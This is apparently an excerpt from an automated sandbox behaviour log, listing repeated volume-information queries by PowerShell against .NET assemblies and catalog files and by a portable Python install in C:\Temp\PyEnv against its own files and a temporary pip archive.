        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\get-pip.py VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\get-pip.py VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\get-pip.py VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\get-pip.py VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\get-pip.py VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\_bz2.pyd VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\_lzma.pyd VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
